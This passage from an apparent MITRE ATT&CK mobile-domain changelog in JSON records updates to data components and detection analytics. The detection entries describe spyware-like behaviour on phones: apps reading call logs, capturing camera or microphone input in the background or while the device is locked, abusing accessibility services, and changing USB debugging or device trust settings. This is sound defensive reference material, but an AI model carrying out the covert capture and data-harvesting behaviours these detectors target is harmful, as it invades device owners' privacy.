class=\"diff_add\">&nbsp;weaken&nbsp;device&nbsp;security&nbsp;controls&nbsp;or&nbsp;alter&nbsp;trusted&nbsp;device&nbsp;rel</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">ationships.&nbsp;&nbsp;Examples&nbsp;Android:&nbsp;&nbsp;-&nbsp;USB&nbsp;debugging&nbsp;enabled&nbsp;-&nbsp;Un</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">known&nbsp;app&nbsp;installation&nbsp;allowed&nbsp;-&nbsp;Developer&nbsp;options&nbsp;enabled&nbsp;&nbsp;</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">iOS:&nbsp;&nbsp;-&nbsp;Developer&nbsp;mode&nbsp;enabled&nbsp;-&nbsp;Device&nbsp;pairing&nbsp;trust&nbsp;relati</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">onships&nbsp;established&nbsp;-&nbsp;Configuration&nbsp;profile&nbsp;restrictions&nbsp;mod</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">ified&nbsp;</span></td></tr>\n        </tbody>\n    </table>"
                },
                {
                    "type": "x-mitre-data-component",
                    "id": "x-mitre-data-component--bf0ff551-a5a7-40e5-bff9-f9405011b1f4",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2023-03-13 20:47:52.557000+00:00",
                    "modified": "2026-03-10 15:59:54.007000+00:00",
                    "revoked": false,
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/data-components/DC0117",
                            "external_id": "DC0117"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "name": "System Notifications",
                    "description": "System Notifications represent operating system alerts, warnings, or status messages generated in response to application actions, system state changes, or security events. These notifications may indicate potentially malicious activity or abnormal application behavior.\n\nExamples\n\n- Application requesting sensitive permissions\n- USB device connected notifications\n- Security warnings triggered by device configuration changes\n\nCollection Methods\n\n- Mobile OS notification monitoring\n- Mobile EDR sensors\n- Device management telemetry\n",
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_deprecated": false,
                    "x_mitre_log_sources": [
                        {
                            "name": "User Interface",
                            "channel": "None"
                        },
                        {
                            "name": "iOS:unifiedlog",
                            "channel": "\\\"has pasted from\\\" cross-app paste notification text containing source app name"
                        }
                    ],
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_version": "2.1",
                    "x_mitre_domains": [
                        "mobile-attack"
                    ],
                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-03-10 15:59:54.007000+00:00\", \"old_value\": \"2025-10-21 15:10:28.402000+00:00\"}, \"root['external_references'][0]['url']\": {\"new_value\": \"https://attack.mitre.org/data-components/DC0117\", \"old_value\": \"https://attack.mitre.org/datacomponents/DC0117\"}, \"root['description']\": {\"new_value\": \"System Notifications represent operating system alerts, warnings, or status messages generated in response to application actions, system state changes, or security events. These notifications may indicate potentially malicious activity or abnormal application behavior.\\n\\nExamples\\n\\n- Application requesting sensitive permissions\\n- USB device connected notifications\\n- Security warnings triggered by device configuration changes\\n\\nCollection Methods\\n\\n- Mobile OS notification monitoring\\n- Mobile EDR sensors\\n- Device management telemetry\\n\", \"old_value\": \"Notifications generated by the OS\", \"diff\": \"--- \\n+++ \\n@@ -1 +1,13 @@\\n-Notifications generated by the OS\\n+System Notifications represent operating system alerts, warnings, or status messages generated in response to application actions, system state changes, or security events. These notifications may indicate potentially malicious activity or abnormal application behavior.\\n+\\n+Examples\\n+\\n+- Application requesting sensitive permissions\\n+- USB device connected notifications\\n+- Security warnings triggered by device configuration changes\\n+\\n+Collection Methods\\n+\\n+- Mobile OS notification monitoring\\n+- Mobile EDR sensors\\n+- Device management telemetry\"}, \"root['x_mitre_version']\": {\"new_value\": \"2.1\", \"old_value\": \"2.0\"}}, \"iterable_item_added\": {\"root['x_mitre_log_sources'][1]\": {\"name\": \"iOS:unifiedlog\", \"channel\": \"\\\\\\\"has pasted from\\\\\\\" cross-app paste notification text containing source app name\"}}}",
                    "previous_version": "2.0",
                    "version_change": "2.0 \u2192 2.1",
                    "description_change_table": "\n    <table class=\"diff\" id=\"difflib_chg_to67__top\"\n           cellspacing=\"0\" cellpadding=\"0\" rules=\"groups\" >\n        <colgroup></colgroup> <colgroup></colgroup> <colgroup></colgroup>\n        <colgroup></colgroup> <colgroup></colgroup> <colgroup></colgroup>\n        <thead><tr><th class=\"diff_next\"><br /></th><th colspan=\"2\" class=\"diff_header\">Old Description</th><th class=\"diff_next\"><br /></th><th colspan=\"2\" class=\"diff_header\">New Description</th></tr></thead>\n        <tbody>\n            <tr><td class=\"diff_next\" id=\"difflib_chg_to67__0\"><a href=\"#difflib_chg_to67__top\">t</a></td><td class=\"diff_header\" id=\"from67_1\">1</td><td nowrap=\"nowrap\"><span class=\"diff_sub\">Notifications&nbsp;generated&nbsp;by&nbsp;the&nbsp;OS</span></td><td class=\"diff_next\"><a href=\"#difflib_chg_to67__top\">t</a></td><td class=\"diff_header\" id=\"to67_1\">1</td><td nowrap=\"nowrap\"><span class=\"diff_add\">System&nbsp;Notifications&nbsp;represent&nbsp;operating&nbsp;system&nbsp;alerts,&nbsp;warn</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">ings,&nbsp;or&nbsp;status&nbsp;messages&nbsp;generated&nbsp;in&nbsp;response&nbsp;to&nbsp;applicatio</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">n&nbsp;actions,&nbsp;system&nbsp;state&nbsp;changes,&nbsp;or&nbsp;security&nbsp;events.&nbsp;These&nbsp;n</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">otifications&nbsp;may&nbsp;indicate&nbsp;potentially&nbsp;malicious&nbsp;activity&nbsp;or&nbsp;</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">abnormal&nbsp;application&nbsp;behavior.&nbsp;&nbsp;Examples&nbsp;&nbsp;-&nbsp;Application&nbsp;requ</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">esting&nbsp;sensitive&nbsp;permissions&nbsp;-&nbsp;USB&nbsp;device&nbsp;connected&nbsp;notifica</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">tions&nbsp;-&nbsp;Security&nbsp;warnings&nbsp;triggered&nbsp;by&nbsp;device&nbsp;configuration&nbsp;</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">changes&nbsp;&nbsp;Collection&nbsp;Methods&nbsp;&nbsp;-&nbsp;Mobile&nbsp;OS&nbsp;notification&nbsp;monito</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">ring&nbsp;-&nbsp;Mobile&nbsp;EDR&nbsp;sensors&nbsp;-&nbsp;Device&nbsp;management&nbsp;telemetry&nbsp;</span></td></tr>\n        </tbody>\n    </table>"
                },
                {
                    "type": "x-mitre-data-component",
                    "id": "x-mitre-data-component--56c2b384-77f8-461f-a71a-76f7888ebfb6",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2023-03-13 20:48:14.540000+00:00",
                    "modified": "2026-04-08 20:14:04.248000+00:00",
                    "revoked": false,
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/data-components/DC0118",
                            "external_id": "DC0118"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "name": "System Settings",
                    "description": "System Settings represent user-visible or OS-level configuration settings that influence device behavior, application permissions, connectivity, or system features.\n\nMonitoring system settings changes allows defenders to detect abnormal modifications that may indicate malicious activity or device compromise.\n\n\nCollection Methods\n\n- MDM device telemetry\n- Mobile EDR monitoring\n- OS configuration monitoring\n",
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_deprecated": false,
                    "x_mitre_log_sources": [
                        {
                            "name": "User Interface",
                            "channel": "None"
                        },
                        {
                            "name": "MobileEDR:telemetry",
                            "channel": "Microphone sensor activation or audio recording session initiated by application process"
                        },
                        {
                            "name": "MobileEDR:telemetry",
                            "channel": "Application transitions to background or executes while screen locked during microphone session"
                        },
                        {
                            "name": "MobileEDR:telemetry",
                            "channel": "Cellular service state transitions (in-service\u2192no-service), SIM state change, carrier/operator identifier change, or baseband/telephony stack state change observed by agent telemetry"
                        },
                        {
                            "name": "MobileEDR:telemetry",
                            "channel": "Application remains backgrounded while accessibility service continues to receive events or perform actions across other foreground apps"
                        },
                        {
                            "name": "android:MDMLog",
                            "channel": "device USB mode change (charging to file transfer / debugging / accessory)"
                        },
                        {
                            "name": "iOS:MDMLog",
                            "channel": "Trusted computer / host relationship established or relevant device trust setting changed"
                        },
                        {
                            "name": "android:MDMLog",
                            "channel": "Application or service remains active, foregrounds, or overlays during device locked state or immediately at unlock transition with weak recent user interaction context"
                        },
                        {
                            "name": "android:MDMLog",
                            "channel": "No user-initiated airplane mode, radio disablement, or managed network setting change occurred during repeated connectivity degradation"
                        },
                        {
                            "name": "iOS:MDMLog",
                            "channel": "No user-initiated airplane mode or radio-related setting change occurred while applications experience repeated network unavailability"
                        },
                        {
                            "name": "MobileEDR:telemetry",
                            "channel": "Camera sensor access began from app identity and remained active for sustained capture interval in app context not mapped to approved video recording workflow"
                        },
                        {
                            "name": "MobileEDR:telemetry",
                            "channel": "Camera sensor access occurred while AppState=background, foreground service active without visible user action, or DeviceLockState=locked during capture interval"
                        },
                        {
                            "name": "MobileEDR:telemetry",
                            "channel": "Foreground service continues accessing camera, microphone, location, or other while-in-use sensors after service promotion and outside recent user interaction"
                        }
                    ],
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_version": "2.1",
                    "x_mitre_domains": [
                        "mobile-attack"
                    ],
                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-04-08 20:14:04.248000+00:00\", \"old_value\": \"2025-10-21 15:10:28.402000+00:00\"}, \"root['external_references'][0]['url']\": {\"new_value\": \"https://attack.mitre.org/data-components/DC0118\", \"old_value\": \"https://attack.mitre.org/datacomponents/DC0118\"}, \"root['description']\": {\"new_value\": \"System Settings represent user-visible or OS-level configuration settings that influence device behavior, application permissions, connectivity, or system features.\\n\\nMonitoring system settings changes allows defenders to detect abnormal modifications that may indicate malicious activity or device compromise.\\n\\n\\nCollection Methods\\n\\n- MDM device telemetry\\n- Mobile EDR monitoring\\n- OS configuration monitoring\\n\", \"old_value\": \"Settings visible to the user on the device\", \"diff\": \"--- \\n+++ \\n@@ -1 +1,10 @@\\n-Settings visible to the user on the device\\n+System Settings represent user-visible or OS-level configuration settings that influence device behavior, application permissions, connectivity, or system features.\\n+\\n+Monitoring system settings changes allows defenders to detect abnormal modifications that may indicate malicious activity or device compromise.\\n+\\n+\\n+Collection Methods\\n+\\n+- MDM device telemetry\\n+- Mobile EDR monitoring\\n+- OS configuration monitoring\"}, \"root['x_mitre_version']\": {\"new_value\": \"2.1\", \"old_value\": \"2.0\"}}, \"iterable_item_added\": {\"root['x_mitre_log_sources'][1]\": {\"name\": \"MobileEDR:telemetry\", \"channel\": \"Microphone sensor activation or audio recording session initiated by application process\"}, \"root['x_mitre_log_sources'][2]\": {\"name\": \"MobileEDR:telemetry\", \"channel\": \"Application transitions to background or executes while screen locked during microphone session\"}, \"root['x_mitre_log_sources'][3]\": {\"name\": \"MobileEDR:telemetry\", \"channel\": \"Cellular service state transitions (in-service\\u2192no-service), SIM state change, carrier/operator identifier change, or baseband/telephony stack state change observed by agent telemetry\"}, \"root['x_mitre_log_sources'][4]\": {\"name\": \"MobileEDR:telemetry\", \"channel\": \"Application remains backgrounded while accessibility service continues to receive events or perform actions across other foreground apps\"}, \"root['x_mitre_log_sources'][5]\": {\"name\": \"android:MDMLog\", \"channel\": \"device USB mode change (charging to file transfer / debugging / accessory)\"}, \"root['x_mitre_log_sources'][6]\": {\"name\": \"iOS:MDMLog\", \"channel\": \"Trusted computer / host relationship established or relevant device trust setting changed\"}, \"root['x_mitre_log_sources'][7]\": {\"name\": \"android:MDMLog\", \"channel\": \"Application or service remains active, foregrounds, or overlays during device locked state or immediately at unlock transition with weak recent user interaction context\"}, \"root['x_mitre_log_sources'][8]\": {\"name\": \"android:MDMLog\", \"channel\": \"No user-initiated airplane mode, radio disablement, or managed network setting change occurred during repeated connectivity degradation\"}, \"root['x_mitre_log_sources'][9]\": {\"name\": \"iOS:MDMLog\", \"channel\": \"No user-initiated airplane mode or radio-related setting change occurred while applications experience repeated network unavailability\"}, \"root['x_mitre_log_sources'][10]\": {\"name\": \"MobileEDR:telemetry\", \"channel\": \"Camera sensor access began from app identity and remained active for sustained capture interval in app context not mapped to approved video recording workflow\"}, \"root['x_mitre_log_sources'][11]\": {\"name\": \"MobileEDR:telemetry\", \"channel\": \"Camera sensor access occurred while AppState=background, foreground service active without visible user action, or DeviceLockState=locked during capture interval\"}, \"root['x_mitre_log_sources'][12]\": {\"name\": \"MobileEDR:telemetry\", \"channel\": \"Foreground service continues accessing camera, microphone, location, or other while-in-use sensors after service promotion and outside recent user interaction\"}}}",
                    "previous_version": "2.0",
                    "version_change": "2.0 \u2192 2.1",
                    "description_change_table": "\n    <table class=\"diff\" id=\"difflib_chg_to68__top\"\n           cellspacing=\"0\" cellpadding=\"0\" rules=\"groups\" >\n        <colgroup></colgroup> <colgroup></colgroup> <colgroup></colgroup>\n        <colgroup></colgroup> <colgroup></colgroup> <colgroup></colgroup>\n        <thead><tr><th class=\"diff_next\"><br /></th><th colspan=\"2\" class=\"diff_header\">Old Description</th><th class=\"diff_next\"><br /></th><th colspan=\"2\" class=\"diff_header\">New Description</th></tr></thead>\n        <tbody>\n            <tr><td class=\"diff_next\" id=\"difflib_chg_to68__0\"><a href=\"#difflib_chg_to68__top\">t</a></td><td class=\"diff_header\" id=\"from68_1\">1</td><td nowrap=\"nowrap\"><span class=\"diff_sub\">Settings&nbsp;visible&nbsp;to&nbsp;the&nbsp;user&nbsp;on&nbsp;the&nbsp;device</span></td><td class=\"diff_next\"><a href=\"#difflib_chg_to68__top\">t</a></td><td class=\"diff_header\" id=\"to68_1\">1</td><td nowrap=\"nowrap\"><span class=\"diff_add\">System&nbsp;Settings&nbsp;represent&nbsp;user-visible&nbsp;or&nbsp;OS-level&nbsp;configura</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">tion&nbsp;settings&nbsp;that&nbsp;influence&nbsp;device&nbsp;behavior,&nbsp;application&nbsp;pe</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">rmissions,&nbsp;connectivity,&nbsp;or&nbsp;system&nbsp;features.&nbsp;&nbsp;Monitoring&nbsp;sys</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">tem&nbsp;settings&nbsp;changes&nbsp;allows&nbsp;defenders&nbsp;to&nbsp;detect&nbsp;abnormal&nbsp;mod</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">ifications&nbsp;that&nbsp;may&nbsp;indicate&nbsp;malicious&nbsp;activity&nbsp;or&nbsp;device&nbsp;co</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">mpromise.&nbsp;&nbsp;&nbsp;Collection&nbsp;Methods&nbsp;&nbsp;-&nbsp;MDM&nbsp;device&nbsp;telemetry&nbsp;-&nbsp;Mob</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">ile&nbsp;EDR&nbsp;monitoring&nbsp;-&nbsp;OS&nbsp;configuration&nbsp;monitoring&nbsp;</span></td></tr>\n        </tbody>\n    </table>"
                }
            ],
            "other_version_changes": [],
            "patches": [],
            "revocations": [],
            "deprecations": [],
            "deletions": []
        },
        "detectionstrategies": {
            "additions": [],
            "major_version_changes": [],
            "minor_version_changes": [],
            "other_version_changes": [],
            "patches": [],
            "revocations": [],
            "deprecations": [],
            "deletions": []
        },
        "analytics": {
            "additions": [],
            "major_version_changes": [
                {
                    "type": "x-mitre-analytic",
                    "id": "x-mitre-analytic--9ed67778-6277-4e12-aa3e-29f39a81e67a",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2025-10-21 15:10:28.402000+00:00",
                    "modified": "2026-03-23 17:35:57.553000+00:00",
                    "revoked": false,
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/detectionstrategies/DET0602#AN1650",
                            "external_id": "AN1650"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "name": "Analytic 1650",
                    "description": "OLD: Application vetting services could look for `android.permission.READ_CALL_LOG` in an Android application\u2019s manifest. Most applications do not need call log access, so extra scrutiny could be applied to those that request it. \nOn Android, the user can manage which applications have permission to access the call log through the device settings screen, revoking the permission if necessary.\n\nNEW: A defender observes an Android application requesting for `android.permission.READ_CALL_LOG`, which may also be listed in the application's manifest file. ",
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_deprecated": false,
                    "x_mitre_domains": [
                        "mobile-attack"
                    ],
                    "x_mitre_log_source_references": [
                        {
                            "x_mitre_data_component_ref": "x-mitre-data-component--9bde2f9d-a695-4344-bfac-f2dce13d121e",
                            "name": "android:logcat",
                            "channel": "Invocation of CallLogs.getLastOutgoingCall()"
                        },
                        {
                            "x_mitre_data_component_ref": "x-mitre-data-component--b1e0bb80-23d4-44f2-b919-7e9c54898f43",
                            "name": "android:MDMLog",
                            "channel": "Application granted or retaining the READ_CALL_LOG permission. "
                        }
                    ],
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_platforms": [
                        "Android"
                    ],
                    "x_mitre_version": "2.0",
                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-03-23 17:35:57.553000+00:00\", \"old_value\": \"2025-10-21 15:10:28.402000+00:00\"}, \"root['description']\": {\"new_value\": \"OLD: Application vetting services could look for `android.permission.READ_CALL_LOG` in an Android application\\u2019s manifest. Most applications do not need call log access, so extra scrutiny could be applied to those that request it. \\nOn Android, the user can manage which applications have permission to access the call log through the device settings screen, revoking the permission if necessary.\\n\\nNEW: A defender observes an Android application requesting for `android.permission.READ_CALL_LOG`, which may also be listed in the application's manifest file. \", \"old_value\": \"Application vetting services could look for `android.permission.READ_CALL_LOG` in an Android application\\u2019s manifest. Most applications do not need call log access, so extra scrutiny could be applied to those that request it. \\nOn Android, the user can manage which applications have permission to access the call log through the device settings screen, revoking the permission if necessary.\", \"diff\": \"--- \\n+++ \\n@@ -1,2 +1,4 @@\\n-Application vetting services could look for `android.permission.READ_CALL_LOG` in an Android application\\u2019s manifest. Most applications do not need call log access, so extra scrutiny could be applied to those that request it. \\n+OLD: Application vetting services could look for `android.permission.READ_CALL_LOG` in an Android application\\u2019s manifest. Most applications do not need call log access, so extra scrutiny could be applied to those that request it. \\n On Android, the user can manage which applications have permission to access the call log through the device settings screen, revoking the permission if necessary.\\n+\\n+NEW: A defender observes an Android application requesting for `android.permission.READ_CALL_LOG`, which may also be listed in the application's manifest file. \"}, \"root['x_mitre_version']\": {\"new_value\": \"2.0\", \"old_value\": \"1.0\"}, \"root['x_mitre_log_source_references'][0]\": {\"new_value\": {\"x_mitre_data_component_ref\": \"x-mitre-data-component--9bde2f9d-a695-4344-bfac-f2dce13d121e\", \"name\": \"android:logcat\", \"channel\": \"Invocation of CallLogs.getLastOutgoingCall()\"}, \"old_value\": {\"x_mitre_data_component_ref\": \"x-mitre-data-component--b1e0bb80-23d4-44f2-b919-7e9c54898f43\", \"name\": \"Application Vetting\", \"channel\": \"None\"}}, \"root['x_mitre_log_source_references'][1]\": {\"new_value\": {\"x_mitre_data_component_ref\": \"x-mitre-data-component--b1e0bb80-23d4-44f2-b919-7e9c54898f43\", \"name\": \"android:MDMLog\", \"channel\": \"Application granted or retaining the READ_CALL_LOG permission. \"}, \"old_value\": {\"x_mitre_data_component_ref\": \"x-mitre-data-component--56c2b384-77f8-461f-a71a-76f7888ebfb6\", \"name\": \"User Interface\", \"channel\": \"None\"}}}}",
                    "previous_version": "1.0",
                    "version_change": "1.0 \u2192 2.0",
                    "description_change_table": "\n    <table class=\"diff\" id=\"difflib_chg_to107__top\"\n           cellspacing=\"0\" cellpadding=\"0\" rules=\"groups\" >\n        <colgroup></colgroup> <colgroup></colgroup> <colgroup></colgroup>\n        <colgroup></colgroup> <colgroup></colgroup> <colgroup></colgroup>\n        <thead><tr><th class=\"diff_next\"><br /></th><th colspan=\"2\" class=\"diff_header\">Old Description</th><th class=\"diff_next\"><br /></th><th colspan=\"2\" class=\"diff_header\">New Description</th></tr></thead>\n        <tbody>\n            <tr><td class=\"diff_next\" id=\"difflib_chg_to107__0\"><a href=\"#difflib_chg_to107__top\">t</a></td><td class=\"diff_header\" id=\"from107_1\">1</td><td nowrap=\"nowrap\"><span class=\"diff_chg\">Application</span>&nbsp;vetting&nbsp;services&nbsp;could&nbsp;look&nbsp;for&nbsp;`android.permiss</td><td class=\"diff_next\"><a href=\"#difflib_chg_to107__top\">t</a></td><td class=\"diff_header\" id=\"to107_1\">1</td><td nowrap=\"nowrap\"><span class=\"diff_chg\">OLD:&nbsp;Application</span>&nbsp;vetting&nbsp;services&nbsp;could&nbsp;look&nbsp;for&nbsp;`android.pe</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">ion.READ_CALL_LOG`&nbsp;in&nbsp;an&nbsp;Android&nbsp;application\u2019s&nbsp;manifest.&nbsp;Mos</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">rmission.READ_CALL_LOG`&nbsp;in&nbsp;an&nbsp;Android&nbsp;application\u2019s&nbsp;manifest</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">t&nbsp;applications&nbsp;do&nbsp;not&nbsp;need&nbsp;call&nbsp;log&nbsp;access,&nbsp;so&nbsp;extra&nbsp;scrutin</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">.&nbsp;Most&nbsp;applications&nbsp;do&nbsp;not&nbsp;need&nbsp;call&nbsp;log&nbsp;access,&nbsp;so&nbsp;extra&nbsp;sc</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">y&nbsp;could&nbsp;be&nbsp;applied&nbsp;to&nbsp;those&nbsp;that&nbsp;request&nbsp;it.&nbsp;&nbsp;On&nbsp;Android,&nbsp;th</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">rutiny&nbsp;could&nbsp;be&nbsp;applied&nbsp;to&nbsp;those&nbsp;that&nbsp;request&nbsp;it.&nbsp;&nbsp;On&nbsp;Androi</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">e&nbsp;user&nbsp;can&nbsp;manage&nbsp;which&nbsp;applications&nbsp;have&nbsp;permission&nbsp;to&nbsp;acce</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">d,&nbsp;the&nbsp;user&nbsp;can&nbsp;manage&nbsp;which&nbsp;applications&nbsp;have&nbsp;permission&nbsp;to</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">ss&nbsp;the&nbsp;call&nbsp;log&nbsp;through&nbsp;the&nbsp;device&nbsp;settings&nbsp;screen,&nbsp;revoking</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">&nbsp;access&nbsp;the&nbsp;call&nbsp;log&nbsp;through&nbsp;the&nbsp;device&nbsp;settings&nbsp;screen,&nbsp;rev</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">&nbsp;the&nbsp;permission&nbsp;if&nbsp;necessary.</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">oking&nbsp;the&nbsp;permission&nbsp;if&nbsp;necessary.<span class=\"diff_add\">&nbsp;&nbsp;NEW:&nbsp;A&nbsp;defender&nbsp;observes</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">&nbsp;an&nbsp;Android&nbsp;application&nbsp;requesting&nbsp;for&nbsp;`android.permission.R</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">EAD_CALL_LOG`,&nbsp;which&nbsp;may&nbsp;also&nbsp;be&nbsp;listed&nbsp;in&nbsp;the&nbsp;application's</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">&nbsp;manifest&nbsp;file.&nbsp;</span></td></tr>\n        </tbody>\n    </table>"
                },
                {
                    "type": "x-mitre-analytic",
                    "id": "x-mitre-analytic--5e90ac48-345b-445a-877f-596737ad7efb",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2025-10-21 15:10:28.402000+00:00",
                    "modified": "2026-03-02 20:08:42.566000+00:00",
                    "revoked": false,
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/detectionstrategies/DET0626#AN1693",
                            "external_id": "AN1693"
                        },
                        {
                            "source_name": "Android_UnsafeURILoading_Sept2024",
                            "description": "Android Developers. (2024, September 24). Webviews \u2013 Unsafe URI Loading. Retrieved March 2, 2026.",
                            "url": "https://developer.android.com/privacy-and-security/risks/unsafe-uri-loading"
                        },
                        {
                            "source_name": "Android-AppLinks",
                            "description": "Android. (n.d.). Handling App Links. Retrieved December 21, 2016.",
                            "url": "https://developer.android.com/training/app-links/index.html"
                        },
                        {
                            "source_name": "IETF-OAuthNativeApps",
